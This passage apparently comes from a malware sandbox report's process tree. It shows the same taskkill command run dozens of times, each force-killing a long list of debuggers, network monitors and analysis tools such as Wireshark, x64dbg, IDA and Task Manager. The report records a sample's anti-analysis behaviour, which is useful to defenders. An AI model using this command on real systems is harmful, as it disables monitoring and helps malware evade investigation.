        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3556
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2348
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1528
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1164
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1620
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4276
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2976
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1120
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1664
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4916
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4976
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:5008
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1684
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:752
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4528
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2436
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1080
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1776
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2012
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:872
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4552
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:1144
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1408
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3268
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4024
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:1492
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4708
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2180
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        
        PID:4480
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:4936
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:636
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:3952
      - C:\Windows\system32\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /F /IM ProcessHacker.exe /IM taskmgr.exe /IM HTTPDebuggerSvc.exe /IM Fiddler.exe /IM de4dot.exe /IM procexp.exe /IM procexp64.exe /IM procexp64a.exe /IM dnspy.exe /IM tcpview.exe /IM autoruns.exe /IM autorunsc.exe /IM filemon.exe /IM procmon.exe /IM regmon.exe /IM idaq.exe /IM idaq64.exe /IM ImmunityDebugger.exe /IM Wireshark.exe /IM dumpcap.exe /IM HookExplorer.exe /IM ImportREC.exe /IM PETools.exe /IM LordPE.exe /IM SysInspector.exe /IM proc_analyzer.exe /IM sysAnalyzer.exe /IM sniff_hit.exe /IM windbg.exe /IM joeboxcontrol.exe /IM joeboxserver.exe /IM x32dbg.exe /IM x64dbg.exe /IM httpdebugger.exe
        6⤵
        Kills process with taskkill
        
        PID:2356
      - C:\Windows\system32\taskkill.exe
        
